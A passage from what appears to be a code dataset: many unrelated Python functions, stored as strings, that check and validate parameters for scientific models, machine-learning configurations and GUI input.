of the clusters is '\r\n # 'smaller than the actual numbers of input parameters')\r\n #\r\n # if clust_data[1].shape[1] > meta_model.get_out_par_means().shape[1]:\r\n # raise TypeError('The number of output parameters for the output database of the clusters is '\r\n # 'bigger than the actual number of output parameters')\r\n #\r\n # elif clust_data[1].shape[1] < meta_model.get_out_par_means().shape[1]:\r\n # raise TypeError('The number of output parameters for the output database of the clusters is '\r\n # 'smaller than the actual numbers of output parameters')\r\n #\r\n # if clust_data[0].shape[0] != clust_data[1].shape[0]:\r\n # raise TypeError('The number rows in the input and output database differ from each other')\r\n\r\n else: # No check-up is done when the meta-model is an unknown version\r\n warnings.warn('The additional cluster data can not be checked, for this kind of meta-model')\r\n\r\n RM.check_if_same_size(clust_cent.shape[0], model_data.shape[0],\r\n 'The number of clusters according to the cluster centers',\r\n 'The number of clusters according to the model_data')", "def check_params(params):\n assert 'split' in params.keys(\n ), 'Params must include split (train, val, or test).'\n\n required = ['batch_size', 'im_shape']\n for r in required:\n assert r in params.keys(), 'Params must include {}'.format(r)", "def check_gmm_param(w, mu, va):\n \n # Check that w is valid\n if not len(w.shape) == 1:\n raise GmParamError('weight should be a rank 1 array')\n\n if N.fabs(N.sum(w) - 1) > misc.MAX_DBL_DEV:\n raise GmParamError('weight does not sum to 1')\n \n # Check that mean and va have the same number of components\n k = len(w)\n\n if N.ndim(mu) < 2:\n msg = \"mu should be a K,d matrix, and a row vector if only 1 comp\"\n raise GmParamError(msg)\n if N.ndim(va) < 2:\n msg = \"\"\"va should be a K,d / K *d, d matrix, and a row vector if\n only 1 diag comp\"\"\"\n raise GmParamError(msg)\n\n (km, d) = mu.shape\n (ka, da) = va.shape\n\n if not k == km:\n msg = \"not same number of component in mean and weights\"\n raise GmParamError(msg)\n\n if not d == da:\n msg = \"not same number of dimensions in mean and variances\"\n raise GmParamError(msg)\n\n if km == ka:\n mode = 'diag'\n else:\n mode = 'full'\n if not ka == km*d:\n msg = \"not same number of dimensions in mean and variances\"\n raise GmParamError(msg)\n \n return k, d, mode", "def check_params(params):\n assert 'split' in params.keys(\n ), 'Params must include split (train, val, or test).'\n\n required = ['batch_size', 'root', 'im_shape']\n for r in required:\n assert r in params.keys(), 'Params must include {}'.format(r)", "def check_data(self):\n\n missing_params = {}\n flag = False\n\n missing_params['general'] = {}\n for name, param in self.params.items():\n if not param.check():\n missing_params['general'][name] = param.get_description()\n flag = True\n\n for component, comp_obj in self.components.items():\n missing_params[component], flag_comp = comp_obj.check_data()\n\n # Assign empty component parameters that have a general version:\n empty_general_params = set(missing_params[component]).intersection(\n set(self.params))\n for param in empty_general_params:\n comp_obj.change_param_object(param, self.params[param])\n del missing_params[component][param]\n\n if missing_params[component]:\n flag = True\n\n if flag:\n raise Exception('Following parameters are missing:\\n{}'\n .format(\n self._print_params(missing_params, disp=False)))\n\n return True", "def validate_params(self, params: Scenario) -> bool:\n valid = 
True\n # Make sure all needed parameters were provided\n valid = valid and \"R\" in params\n valid = valid and \"L\" in params\n\n # Make sure all parameters are physically valid\n valid = valid and params[\"R\"] > 0\n valid = valid and params[\"L\"] > 0\n\n return valid", "def _check_parameters_support(self, parameters=()):\n for parameter in parameters:\n assert parameter in self._supported, \"Estimation %s is not implemented yet\" % parameter", "def check(self, parameters):\n if np.any(parameters < self._lower):\n return False\n if np.any(parameters > self._upper):\n return False\n return True", "def checkUserInput(self, stguess):\n lines = stguess.splitlines()\n if len(lines) == 0:\n return False\n err = \"\"\n for l, line in enumerate(lines):\n items = line.split(',')\n np = len(items)\n if np != 4 and np != 6:\n err = \"Wrong number of parameters\"\n else:\n for p in range(0, np):\n val = items[p].strip()\n if p == 0:\n if not val in ['G', 'L', 'P', 'AG', 'AL', 'AP']:\n err = \"Unknown peak type\"\n else:\n if not isNumber(val):\n err = \"Parameter {0} in not numeric\".format(p+1)\n break\n v = float(val)\n if p == 1: # xm\n if v < self.data[0].min() or v > self.data[0].max():\n err = \"Parameter {0} out of range\".format(p+1)\n break\n if p == 2: # amp\n if v < self.data[1].min() * 1.1 \\\n or v > self.data[1].max() * 1.1:\n err = \"Parameter {0} out of range\".format(p+1)\n break\n if p == 3: # w\n xspan = getSpan(self.data[0])\n if v < xspan / self.npt or v > (xspan / 2):\n err = \"Parameter {0} out of range\".format(p+1)\n break\n if p == 4: # asym\n maxasym = 1000 / self.data[0].max()\n if v < -maxasym or v > maxasym:\n err = \"Parameter {0} out of range\".format(p+1)\n break\n if p == 5: # Lfrac\n if v < 0.0 or v > 1.0:\n err = \"Parameter {0} out of range\".format(p+1)\n break\n if err:\n break\n if err:\n errmsg = \"Error in peak {0}:\\n{1}\".format(l+1, err)\n QtWidgets.QMessageBox.warning(self.parent, self.title, errmsg)\n return False\n return True", "def check_hparams(self, hparams):\n error_messages = []\n\n # Check global params.\n feature_names = hparams.get_feature_names()\n global_values, per_feature_values = hparams.get_global_and_feature_params(\n ['num_keypoints', 'missing_input_value',\n 'missing_output_value'], feature_names)\n global_param_error_messages = self._check_param_configuration(\n *global_values)\n if global_param_error_messages:\n error_messages.append('Error message for global param:')\n error_messages += global_param_error_messages\n\n # Check per feature params. hparams.get_feature_names() will only return\n # feature names that sets per feature parameters.\n for feature_idx in range(len(per_feature_values)):\n per_feature_param_error_messages = self._check_param_configuration(\n *per_feature_values[feature_idx])\n if per_feature_param_error_messages:\n error_messages.append(\n 'Error message for %s feature param:' % feature_names[feature_idx])\n error_messages += per_feature_param_error_messages\n\n if error_messages:\n raise ValueError(\n 'Hyperparameter configuration cannot be used in the calibrated '\n 'lattice estimator. 
Error messages report the issue per feature, but'\n ' the parameter may be inherited from global parameter.\\nDetailed '\n 'error messsages\\n%s' % '\\n'.join(error_messages))", "def check(self):\n if 'MISFIT' not in PAR:\n setattr(PAR, 'MISFIT', 'Waveform')\n\n if 'CHANNELS' not in PAR:\n raise ParameterError(PAR, 'CHANNELS')\n\n if 'READER' not in PAR:\n raise ParameterError(PAR, 'READER')\n\n if 'WRITER' not in PAR:\n setattr(PAR, 'WRITER', PAR.READER)\n\n if 'NORMALIZE' not in PAR:\n setattr(PAR, 'NORMALIZE', True)\n\n # mute settings\n if 'MUTE' not in PAR:\n setattr(PAR, 'MUTE', False)\n\n if 'MUTESLOPE' not in PAR:\n setattr(PAR, 'MUTESLOPE', 0.)\n\n if 'MUTECONST' not in PAR:\n setattr(PAR, 'MUTECONST', 0.)\n\n # filter settings\n if 'BANDPASS' not in PAR:\n setattr(PAR, 'BANDPASS', False)\n\n if 'FREQLO' not in PAR:\n setattr(PAR, 'FREQLO', 0.)\n\n if 'FREQHI' not in PAR:\n setattr(PAR, 'FREQHI', 0.)\n\n # assertions\n if PAR.READER not in dir(readers):\n print msg.ReaderError\n raise ParameterError()\n\n if PAR.WRITER not in dir(writers):\n print msg.WriterError\n raise ParameterError()", "def checkParams(needle,haystack,selName,het,firstOnly):\n\t# check Needle\n\tif len(needle)==0 or type(needle)!=types.StringType:\n\t\tprint \"Error: Please provide a string 'needle' to search for.\"\n\t\tprint \"Error: For help type 'help motifFinder'.\"\n\t\treturn False\n \n\t# check Haystack\n\tif len(haystack)==0 or type(haystack)!=types.StringType:\n\t\tprint \"Error: Please provide valid PyMOL object or selection name\"\n\t\tprint \"Error: in which to search.\"\n\t\tprint \"Error: For help type 'help motifFinder'.\"\n\t\treturn False\n \n\t# check het\n\ttry:\n\t\thet = bool(int(het))\n\texcept ValueError:\n\t\tprint \"Error: The 'het' parameter was not 0 or 1.\"\n\t\treturn False\n \n\t# check first Only\n\ttry:\n\t\tfirstOnly = bool(int(het))\n\texcept ValueError:\n\t\tprint \"Error: The 'firstOnly' parameter was not 0 or 1.\"\n\t\treturn False\n \n\t# check selName\n\tif type(selName)!=(types.StringType) and type(selName)!=(types.NoneType):\n\t\tprint \"Error: selName was not a string.\"\n\t\treturn False\n \n\treturn True", "def constrain_pars(model_info, pars):\n name = model_info['id']\n # if it is a product model, then just look at the form factor since\n # none of the structure factors need any constraints.\n if '*' in name:\n name = name.split('*')[0]\n\n if name == 'capped_cylinder' and pars['cap_radius'] < pars['radius']:\n pars['radius'], pars['cap_radius'] = pars['cap_radius'], pars['radius']\n if name == 'barbell' and pars['bell_radius'] < pars['radius']:\n pars['radius'], pars['bell_radius'] = pars['bell_radius'], pars['radius']\n\n # Limit guinier to an Rg such that Iq > 1e-30 (single precision cutoff)\n if name == 'guinier':\n #q_max = 0.2 # mid q maximum\n q_max = 1.0 # high q maximum\n rg_max = np.sqrt(90*np.log(10) + 3*np.log(pars['scale']))/q_max\n pars['rg'] = min(pars['rg'], rg_max)\n\n if name == 'rpa':\n # Make sure phi sums to 1.0\n if pars['case_num'] < 2:\n pars['Phia'] = 0.\n pars['Phib'] = 0.\n elif pars['case_num'] < 5:\n pars['Phia'] = 0.\n total = sum(pars['Phi'+c] for c in 'abcd')\n for c in 'abcd':\n pars['Phi'+c] /= total", "def _check_parameters(self, ep, params):\n\n any_group_satisfied = False\n for group in ep.REQUIRED:\n if all(required_param in params for required_param in group):\n any_group_satisfied = True\n\n if not any_group_satisfied:\n raise ValueError(f\"Got parameters {params}, expected one of {ep.REQUIRED}\")\n\n for key in params:\n if 
key not in ep.POSSIBLE:\n raise ValueError(f\"Got {key}, expected one of {ep.POSSIBLE}\")", "def checkParameters(self):\n EDVerbose.DEBUG(\"EDPluginExecGnomv0_1.checkParameters\")\n self.checkMandatoryParameters(self.dataInput, \"Data Input is None\")\n self.checkMandatoryParameters(self.dataInput.experimentalDataQ, \"Scattering vector values are missing\")\n self.checkMandatoryParameters(self.dataInput.experimentalDataValues, \"Experimental intensity values are missing\")", "def check_parameters(self, parameter_set: CHARMMParameterFile) -> bool:\n return parameter_set.check_parameters(self)", "def _check_params(self):\n pass", "def check_valid_params(cls, **user_params):\n # Check that the appropriate number of params are provided\n if not all(key in user_params for key in cls.param.keys()):\n raise ValueError(f\"Missing parameter! Expected {cls.param.keys()} but was given {user_params.keys()}\")\n\n # Check parameter units and values\n for (key, allowed_params), user_param in zip(cls.param.items(), user_params.values()):\n\n # If both have units, check that the user param value is valid. If valid, continue. Else, error\n if type(user_param) == Quantity and type(allowed_params) == Quantity:\n if get_physical_type(user_param.unit) != get_physical_type(allowed_params.unit):\n raise UnitTypeError(f\"Incorrect units {user_param.unit} provided for parameter {key}, \"\n f\"expected {allowed_params.unit}\")\n\n elif np.isin(user_param.to(allowed_params.unit).value, allowed_params.value):\n continue\n else:\n raise ValueError(f\"Invalid value '{user_param}' provided for parameter {key}, \"\n f\"allowed value(s): {allowed_params}\")\n\n # If one only one has units, then error\n elif (type(user_param) == Quantity) ^ (type(allowed_params) == Quantity):\n # User param has units, model param is unitless\n if type(user_param) == Quantity:\n raise ValueError(f\"Invalid units {user_param.unit} for parameter {key} provided, expected None\")\n else:\n raise ValueError(f\"Missing units for parameter {key}, expected {allowed_params.unit}\")\n\n # Check that unitless user param value is valid. If valid, continue. Else, Error\n elif user_param in allowed_params:\n continue\n else:\n raise ValueError(f\"Invalid value '{user_param}' provided for parameter {key}, \"\n f\"allowed value(s): {allowed_params}\")\n\n # Check Combinations (Logic lives inside model subclasses under model.isvalid_param_combo)\n if user_params not in cls.get_param_combinations():\n raise ValueError(\n f\"Invalid parameter combination. 
See {cls.__class__.__name__}.get_param_combinations() for a \"\n \"list of allowed parameter combinations.\")", "def _check_whether_has_params(self, params) -> bool:\n\n if params:\n return True\n return False", "def checkUserInput(self):\n prm = []\n err = \"\"\n guess = self.text.text()\n items = str(guess).split(',')\n if len(items) != 2:\n err = \"Two parameters must be given\"\n else:\n for i in range(0, len(items)):\n val = items[i].strip()\n if not isNumber(val):\n err = \"Parameter {0} is not numeric\".format(i + 1)\n break\n if float(val) < 0.0:\n err = \"Parameter {0} is negative\".format(i + 1)\n break\n val = float(val)\n if i == 0 and val > self.yspan:\n err = \"minHeight is too large\"\n break\n if i == 1:\n if val < self.xspan/self.npt or val > self.xspan/2:\n err = \"minWidth is too large\"\n break\n prm.append(val)\n if err:\n errmsg = \"Incorrect input:\\n{0}\".format(err)\n QtWidgets.QMessageBox.warning(self, self.title, errmsg)\n return False\n\n # Store parameters values in global variables for the next call\n global lastfilename, lastmph, lastmpw\n lastfilename = self.pltw.filename\n self.mph = lastmph = prm[0]\n self.mpw = lastmpw = prm[1]\n return True", "def param_check(self, params, func_name):\n help = None\n fun = getattr(self, func_name, None)\n if fun and getattr(fun, '__cement_meta__', None):\n help = fun.__cement_meta__['help']\n\n for p in params:\n param = getattr(self.app.pargs, p, None)\n if param is None:\n log.print_err(\"param {} miss, see help:\".format(p))\n if help:\n print(help)\n return False\n return True", "def check_params(params):\n\n required = ['gtsrb_train_root', 'gtsrb_test_root', 'batch_size']\n for r in required:\n assert r in params.keys(), 'Params must include {}'.format(r)", "def check_params(self):\n raise NotImplementedError", "def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n\n super().check_params(X)", "def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n\n super().check_params(X)", "def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n\n super().check_params(X)", "def validate(cls, params):\n if np.isnan(params['loc']).sum():\n raise InvalidParamsError(\n \"Real location (mu) values are required for\"\n \" lognormal uncertainties.\"\n )\n if np.isnan(params['scale']).sum() or (params['scale'] <= 0).sum():\n raise InvalidParamsError(\n \"Real, positive scale (sigma) values are required for\"\n \" lognormal uncertainties.\"\n )", "def _validate_array_params(array_params):\n if isinstance(array_params, dict):\n # Shallow check; make sure each antenna position is a 3-vector.\n if all(len(pos) == 3 for pos in array_params.values()):\n return True\n elif isinstance(array_params, str):\n # Shallow check; just make sure the file exists.\n return os.path.exists(array_params)\n else:\n raise TypeError(\"Array layout must be a dictionary or path to a layout csv.\")", "def getIsValidParameters(self):\n isVolumValid = self.volume > 0\n if not isVolumValid:\n return isVolumValid, 'Invalid input volume'\n\n if not self.lowerLimitPressureInspiratory <= self.pressureInspiratory <= self.higherLimitPressureInspiratory:\n return False, f'Selected inspiratory value must be between {self.lowerLimitPressureInspiratory} cmH20 ' \\\n f'and {self.higherLimitPressureInspiratory} cmH2O.'\n\n if not self.lowerLimitPressureExpiratory <= self.pressureExpiratory <= self.higherLimitPressureExpiratory:\n return False, f'Selected expiratory value must be between {self.lowerLimitPressureExpiratory} 
cmH20 ' \\\n f'and {self.higherLimitPressureExpiratory} cmH2O.'\n\n return self._getIsValidParameters()", "def _check_difficulty_parameters(difficulty, model):\n max_value = difficulty.shape[1] + 1\n\n if model in [\"grm\"]:\n # Check that all the arguments are sorted\n if not np.all(difficulty[:, :-1] < difficulty[:, 1:]):\n raise AssertionError(\"Difficulty Parameters must be \"\n \"in ascending order\")\n\n elif model in ['gum']:\n # Parameters must be odd\n if max_value % 2:\n raise AssertionError(\"There must be an odd number of \"\n \"difficulty parameters\")\n\n # Parameters must be skew-symmetric about the center point\n middle_index = (difficulty.shape[1] - 1) // 2\n adjusted_difficulty = (difficulty -\n difficulty[:, middle_index][:, None])\n\n if not np.all(np.abs(adjusted_difficulty.sum(axis=1)) < 1e-7):\n raise AssertionError(\"Difficulty Parameters must be \"\n \"symmetric about offset\")\n\n max_value = middle_index + 1\n\n return max_value", "def validate_parameters(self):\n\n flag = True\n warnings = \"\"\n # Check radius\n r = self.parameters.get('r', 0)\n if type(r) not in [int, float]:\n flag = False\n warnings += \"Radius r must be a float value\\n\"\n else:\n if r <= 0:\n flag = False\n warnings += \"Radius r must be higher than 0\\n\"\n # Check if is full penetrating\n op = self.parameters.get('full', False)\n\n if not op:\n # Check observation well length\n if 'd' in self.parameters and 'l' in self.parameters:\n d = self.parameters.get('d', -1)\n l = self.parameters.get('l', -1)\n if type(l) not in [int, float]:\n flag = False\n warnings += \"Depth of well bottom must be a float value\\n\"\n else:\n if l < 0:\n flag = False\n warnings += \"Depth l must be higher than 0\\n\"\n if type(d) not in [int, float]:\n flag = False\n warnings += \"Depth of well screen must be a float value\\n\"\n else:\n if d < 0 or d > l:\n flag = False\n warnings += \"Depth d must be in range 0 <= d <= l\\n\"\n # Check piezometer depth\n elif 'z' in self.parameters:\n z = self.parameters.get('z', -1)\n if type(z) not in [int, float]:\n flag = False\n warnings += \"Depth of piezometer must be a float value\\n\"\n else:\n if z < 0:\n flag = False\n warnings += \"Depth z must be higher than 0\\n\"\n else:\n flag = False\n warnings += \"Well don't contain well depth attributes\\n\"\n return(flag, warnings) # End Function", "def validate_params(cls, args):\n if not (len(args) == 3 or len(args) == 5 or len(args) == 7):\n sys.exit(\n 'Execute o script passando o caminho do diretório das'\n ' imagens, ou apenas o path de uma imagem e decida se'\n ' deseja mover ou não'\n )\n args_dict = cls.__make_params(args)\n keys_args_set = set(args_dict.keys())\n if keys_args_set.difference(KEYS_DEFAULT_AS_SET) != set():\n sys.exit(\n 'Verifique a passagem de parâmetros.'\n ' Foi encontrado parâmetros desconhecidos.'\n )\n\n return cls.__check_args(args_dict)", "def check_parameters(args):\n inference_algorithm = args[\"inference_algorithm\"]\n combination_algorithm = args[\"combination_algorithm\"]\n measures = args[\"measures\"]\n prior = args[\"prior\"]\n inverse_dynamics_model_checkpoint = args[\"inverse_dynamics_model_checkpoint\"]\n\n check_in(\n \"inference_algorithm\",\n inference_algorithm,\n [\n \"rlsp\",\n \"latent_rlsp\",\n \"latent_rlsp_ablation\",\n \"sampling\",\n \"deviation\",\n \"reachability\",\n \"spec\",\n ],\n )\n check_in(\n \"combination_algorithm\",\n combination_algorithm,\n (\"additive\", \"bayesian\", \"latent_vi\", \"latent_ppo\"),\n )\n check_in(\"prior\", prior, [\"gaussian\", 
\"laplace\", \"uniform\"])\n\n for i, measure in enumerate(measures):\n check_in(\n \"measure {}\".format(i),\n measure,\n [\"inferred_reward\", \"true_reward\", \"final_reward\", \"model_training_error\"],\n )\n\n if combination_algorithm == \"bayesian\":\n check_in(\"inference_algorithm\", inference_algorithm, [\"rlsp\", \"sampling\"])\n\n if inference_algorithm == \"latent_rlsp\":\n check_not_none(\n \"inverse_dynamics_model_checkpoint\", inverse_dynamics_model_checkpoint\n )\n\n if (\n combination_algorithm.startswith(\"latent\")\n and inference_algorithm != \"latent_rlsp\"\n ):\n raise ValueError(\n \"combination_algorithm 'latent' should only be used with 'latent_rlsp'\"\n )", "def Check(self, parameters):", "def checkParameters(self):\n self.DEBUG(\"EDPluginExecDatGnomv1_0.checkParameters\")\n self.checkMandatoryParameters(self.dataInput, \"Data Input is None\")\n self.checkMandatoryParameters(self.dataInput.inputCurve, \"No input Curve file provided\")", "def _check_param(grads, images, kernel_name, align_corners, half_pixel_centers):\n if half_pixel_centers:\n if align_corners:\n raise RuntimeError(\"If half_pixel_centers is True, \"\n \"align_corners must be False.\")\n grads_shape = grads.get(\"shape\")\n grads_dtype = grads.get(\"dtype\")\n images_shape = images.get(\"shape\")\n images_dtype = images.get(\"dtype\")\n data_limit = ((1 << 31) - 1) // (4 if images_dtype == \"float32\" else 2)\n util.check_kernel_name(kernel_name)\n util.check_shape_rule(grads_shape)\n util.check_shape_rule(images_shape)\n util.check_shape_size(grads_shape, data_limit)\n util.check_shape_size(images_shape, data_limit)\n check_list_grads = (\"float32\")\n check_list_images = (\"float32\")\n util.check_dtype_rule(grads_dtype.lower(), check_list_grads)\n util.check_dtype_rule(images_dtype.lower(), check_list_images)", "def _check_parameter_unpacking(self, method:Callable, model_parameters:dict) -> bool:\r\n\r\n check_ok = True\r\n\r\n _lines = inspect.getsourcelines(method)\r\n _code_text = ''.join(_lines[0]).replace('\\n', '').replace(' ', '').replace('\\\\', '').replace(',]', ']').split('#')[0]\r\n _doc = inspect.getdoc(method)\r\n _doc_text = _doc.replace('\\n', '').replace(' ', '').replace('\\\\', '').replace(',]', ']')\r\n code_text = _code_text.replace(_doc_text, '')\r\n\r\n # Check for correct parameter unpacking when model_parameters are unpacked at once\r\n if 'self.model_parameters.to_numpy()' in code_text:\r\n search_str = str(list(model_parameters.keys())).replace(' ', '').replace(\"'\", \"\").replace('[','').replace(']','')+'=self.model_parameters.to_numpy()'\r\n if not search_str in code_text:\r\n correct_str = search_str.replace(',', ', ').replace('=', ' = ')\r\n warnings.warn(\r\n f'Detected wrong order of parameter unpacking at once. 
Correct order would be {correct_str}', \r\n UserWarning,\r\n )\r\n check_ok = False\r\n\r\n # Check correct parameter unpacking using the model_parameters dict keys\r\n # First get the lines of the doc string and remove any whitespaces\r\n _doc_lines = _doc.replace(' ', '').split('\\n')\r\n for _line in _lines[0]:\r\n # Make sure that not the lines of the docstring\r\n if _line.replace(' ', '').replace('\\n','') not in _doc_lines:\r\n curr_line = _line.replace(' ', '').replace('\\n','').split('#')[0]\r\n # Check correct variable naming for explicit parameter unpacking\r\n if 'self.model_parameters[' in curr_line:\r\n ok_unpack = False\r\n for p in list(model_parameters.keys()):\r\n valid_par_var1 = f\"{p}=self.model_parameters['{p}']\"\r\n valid_par_var2 = f'{p}=self.model_parameters[\"{p}\"]'\r\n if valid_par_var1 in curr_line or valid_par_var2 in curr_line:\r\n ok_unpack = True\r\n break\r\n if not ok_unpack:\r\n _line_msg = _line.replace('\\n','')\r\n warnings.warn(\r\n f'Variable names from explicit parameter unpacking should match those of the corresponding keys.\\nThis line seems bad: {_line_msg}.\\nValid model parameters are {list(model_parameters.keys())}',\r\n UserWarning,\r\n )\r\n check_ok = False\r\n\r\n return check_ok", "def check_param(self):\n check_tuple = (\"float16\", \"float32\", \"int32\")\n check_shape(self.shape_x, param_name=\"x\")\n check_shape(self.shape_indices, param_name=\"indices\")\n check_shape(self.shape_v, param_name=\"v\")\n check_dtype(self.dtype_x, check_tuple, param_name=\"x\")\n check_dtype(self.dtype_indices, (\"int32\",), param_name=\"indices\")\n check_dtype(self.dtype_v, check_tuple, param_name=\"v\")\n if len(self.shape_x) != len(self.shape_v):\n raise RuntimeError(\"The number of dimension x must\"\n \" be same as dimension v\")\n\n if self.shape_v[0] != self.shape_indices[0]:\n raise RuntimeError(\"The length of rank 0 of tensor v must\"\n \" be the same as length of indices\")\n\n if len(self.shape_indices) != 1:\n raise RuntimeError(\"The length of indices only support 1\")\n for i in range(1, len(self.shape_v)):\n if self.shape_x[i] != self.shape_v[i]:\n if not self.check_special():\n raise RuntimeError(\"The length of each rank of tensor x\"\n \" must be the same as length of\"\n \" each or next rank of tensor v\")", "def _check_required_params(self):\n logging.debug('.. check if Experiment have all required parameters')\n for n in self.REQUIRED_PARAMS:\n if n not in self.params:\n raise ValueError('missing \"%s\" among %r' % (n, self.params.keys()))", "def check_params_equal(param1, param2):\n for key, val in param1.items():\n if np.any(param1[key] != param2[key]):\n return False\n return True", "def check_optimization_sanity(self):\n if len(self.parameters) == 0:\n msg = \"No parameters defined. Optimization not possible.\"\n raise ValueError(msg)\n\n if len(self.constraints) == 0:\n msg = \"No constraints defined. 
Optimization not possible.\"\n raise ValueError(msg)", "def test_joint_parameter(self):\n assert_allclose(self.jf.fitparams[0], self.g1.parameters[0])\n assert_allclose(self.jf.fitparams[0], self.g2.parameters[0])", "def validate_parameters(self):\n\n flag = True\n warnings = \"\"\n # Check radius\n r = self.parameters.get('rw', 0)\n if type(r) not in [int, float]:\n flag = False\n warnings += \"Well radius rw must be a float value\\n\"\n else:\n if r <= 0:\n flag = False\n warnings += \"Well radius rw must be higher than 0\\n\"\n # Check if is full penetrating\n op = self.parameters.get('full', False)\n\n if not op:\n # Check observation well length\n if 'd' in self.parameters and 'l' in self.parameters:\n d = self.parameters.get('d', -1)\n l = self.parameters.get('l', -1)\n if type(l) not in [int, float]:\n flag = False\n warnings += \"Depth of well bottom must be a float value\\n\"\n else:\n if l < 0:\n flag = False\n warnings += \"Depth l must be higher than 0\\n\"\n if type(d) not in [int, float]:\n flag = False\n warnings += \"Depth of well screen must be a float value\\n\"\n else:\n if d < 0 or d > l:\n flag = False\n warnings += \"Depth d must be in range 0 <= d <= l\\n\"\n return(flag, warnings) # End Function", "def manual_input_check(manual_params, machine, paths):\n print(\"checking manual input\")\n m = manual_params # so we don't have to type out manual_params everywhere\n\n int_dir = paths[0]\n ncsd_path = paths[1]\n working_dir = paths[2]\n # do we have a 3-body interaction?\n three_body = (abs(m.interaction_type) == 3)\n\n # first check if paths exist\n if not exists(int_dir):\n raise IOError(\n \"Interactions directory \" + int_dir + \" does not exist\")\n if not exists(working_dir):\n raise IOError(\n \"Working directory \" + working_dir + \" does not exist\")\n f2 = join(int_dir, m.two_body_interaction)\n if not exists(f2):\n raise IOError(\"Two body file \"+f2+\" does not exist\")\n if three_body:\n f3 = join(int_dir, m.three_body_interaction)\n if not exists(f3):\n raise IOError(\"Three body file \"+f3+\" does not exist\")\n if not exists(ncsd_path):\n raise IOError(\"NCSD file \"+ncsd_path+\" does not exist!\")\n\n # check that parameters make sense\n if not (m.N_12max >= m.N_1max):\n raise ValueError(\"N_12max must be >= N_1max\")\n if three_body:\n if not (m.N_123max >= m.N_12max):\n raise ValueError(\"N_123max must be >= N_12max\")\n\n # check that parameters match with filenames\n try:\n # TBME file\n tbme_filename = m.two_body_interaction\n last_chunk = tbme_filename.split(\".\")[-1]\n [hbar_omega_verif_0, other_stuff] = last_chunk.split(\"_\")\n hbar_omega_verif_0 = float(hbar_omega_verif_0)\n # see if str(N_1max) + str(N_1max) == other_stuff\n if other_stuff != str(m.N_1max) + str(m.N_12max):\n print(\"\\nYour TMBE file doesn't seem to match your parameters!\")\n print(\"N_1max = \"+str(m.N_1max))\n print(\"N_12max = \"+str(m.N_12max))\n print(\"TBME filename = \"+tbme_filename)\n print(\"relevant section = \"+other_stuff)\n yn = \"\"\n while yn not in [\"y\", \"n\"]:\n yn = input(\"Do you want to continue? (y/n): \")\n if yn == \"y\":\n pass\n else:\n sys.exit(0)\n # see if hbar_omega matches\n if hbar_omega_verif_0 != m.hbar_omega:\n print(\"\\nYour TMBE file doesn't seem to match your parameters!\")\n print(\"hbar_omega = \"+str(m.hbar_omega))\n print(\"TBME filename = \"+tbme_filename)\n print(\"hbar_omega from the file is\", hbar_omega_verif_0)\n yn = \"\"\n while yn not in [\"y\", \"n\"]:\n yn = input(\"Do you want to continue? 
(y/n): \")\n if yn == \"y\":\n pass\n else:\n sys.exit(0)\n except Exception as e:\n print(\"Minor error caught while parsing TMBE filename.\")\n print(\"Printing traceback as if it had caused a crash:\")\n traceback.print_exc()\n print(\"TBME filename that caused this error:\", tbme_filename)\n print(\"We assume everything's fine, but double-check!\\n\")\n\n if three_body:\n try:\n # three-body file\n three_filename = m.three_body_interaction\n [penultimate_chunk, last_chunk] = three_filename.split(\".\")[-2:]\n # get hbar_omega\n [hbar_omega_verif_1, other_stuff] = last_chunk.split(\"_\")\n hbar_omega_verif_1 = float(hbar_omega_verif_1)\n # get N_#max variables\n n_maxes = penultimate_chunk.split(\"_\")[-1]\n # see if str(N_1max) + str(N_1max) == other_stuff\n if n_maxes != str(m.N_123max) + str(m.N_12max) + str(m.N_1max):\n print(\n \"\\nYour 3-body file doesn't seem \"\n \"to match your parameters!\")\n print(\"N_1max = \"+str(m.N_1max))\n print(\"N_12max = \"+str(m.N_12max))\n print(\"N_123max = \"+str(m.N_123max))\n print(\"3-body filename = \"+three_filename)\n print(\"relevant section = \"+n_maxes)\n yn = \"\"\n while yn not in [\"y\", \"n\"]:\n yn = input(\"Do you want to continue? (y/n): \")\n if yn == \"y\":\n pass\n else:\n sys.exit(0)\n # see if hbar_omega matches\n if hbar_omega_verif_1 != m.hbar_omega:\n print(\n \"\\nYour 3-body file doesn't seem \"\n \"to match your parameters!\")\n print(\"hbar_omega = \"+str(m.hbar_omega))\n print(\"3-body filename = \"+three_filename)\n print(\"hbar_omega from the file is\", hbar_omega_verif_1)\n yn = \"\"\n while yn not in [\"y\", \"n\"]:\n yn = input(\"Do you want to continue? (y/n): \")\n if yn == \"y\":\n pass\n else:\n sys.exit(0)\n except Exception as e:\n print(\"Minor error caught while parsing 3-body filename.\")\n print(\"Printing traceback as if it had caused a crash:\")\n traceback.print_exc()\n print(\"3-body filename that caused the error:\", three_filename)\n print(\"We assume everything's fine, but double-check!\\n\")\n\n # check there's at least kappa_points kappa values\n kappa_vals = list(map(float, m.kappa_vals.split()))\n if len(kappa_vals) < m.kappa_points:\n raise ValueError(\n \"You must have at least kappa_points kappa values!\"\n \" kappa_points = \"+str(m.kappa_points))\n\n # and if kappa_points and kappa_vals disagree, make sure they know that\n if len(kappa_vals) > m.kappa_points:\n print(\n \"Did you mean to enter \"+str(len(kappa_vals)) +\n \" values for kappa_min, but set kappa_points to \" +\n str(m.kappa_points)+\"?\")\n user_input = \"\"\n while user_input not in [\"Y\", \"N\"]:\n user_input = input(\"Enter Y to proceed, N to cancel: \")\n if user_input == \"N\":\n print(\"Okay, exiting... 
Try again!\")\n sys.exit(0)\n\n kr_values = [-1, 1, 2, 3, 4]\n if m.kappa_restart not in kr_values:\n raise ValueError(\n \"kappa_restart must be one of\" + \" \".join(map(str, kr_values)))\n\n if m.saved_pivot not in [\"F\", \"T\"]:\n raise ValueError(\"saved_pivot must be either T or F\")\n\n if (m.irest == 1 or m.kappa_restart != -1 or m.nhw_restart != -1) \\\n and m.saved_pivot == \"F\":\n raise ValueError(\"why not use the saved pivot if you're restarting?\")\n\n # if this function runs, the input passes the test", "def _check_model_params(self):\n enc_type = self.configs['encoder_type']\n if enc_type not in ['uni', 'bi', 'gnmt']:\n raise ValueError(\"encoder type must be one of ['uni', 'bi', 'gnmt'].\")\n\n attn = self.configs['attention']\n if attn not in ['', 'luong', 'scaled_luong', 'bahdanau', 'normed_bahdanau']:\n raise ValueError(\n \"attention must be one of \"\n \"['', 'luong', 'scaled_luong', 'bahdanau', 'normed_bahdanau'].\")\n\n num_enc_layers = self.configs['num_encoder_layers']\n num_dec_layers = 